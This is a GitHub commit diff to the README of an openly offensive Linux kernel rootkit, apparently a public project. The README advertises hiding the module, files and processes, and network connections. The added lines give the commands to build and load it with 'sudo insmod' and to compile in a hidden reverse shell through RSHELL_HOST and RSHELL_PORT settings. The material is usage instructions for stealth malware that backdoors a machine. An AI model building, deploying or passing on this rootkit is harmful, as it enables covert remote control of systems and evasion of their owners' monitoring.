We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 5af01cf commit b6c5a25Copy full SHA for b6c5a25
README.md
@@ -25,11 +25,17 @@ Unlike traditional rootkits that rely on direct syscall table hooking or exporte
25
- **Module Hiding** – Hides itself from kernel module listings
26
27
### Demo - Hiding names and processes
28
-
+```c
29
+make STRINGS_EXCLUDES="SOME_KEYWORD,hidden"
30
+sudo insmod mod_rootkit.ko
31
+```
32
<img width="437" alt="image" src="https://github.com/user-attachments/assets/855ae402-1cbd-4f5c-97d4-c83573f18a75" />
33
34
### Demo - Hiding network connections and a hidden reverse shell
35
36
+make RSHELL_HOST=127.0.0.1 RSHELL_PORT=9001 NET_EXCLUDES=9001
37
38
39
<img width="437" alt="image" src="https://github.com/user-attachments/assets/c6fdb061-8fb6-4456-91a0-61037c303752" />
40
41
## Requirements
0 commit comments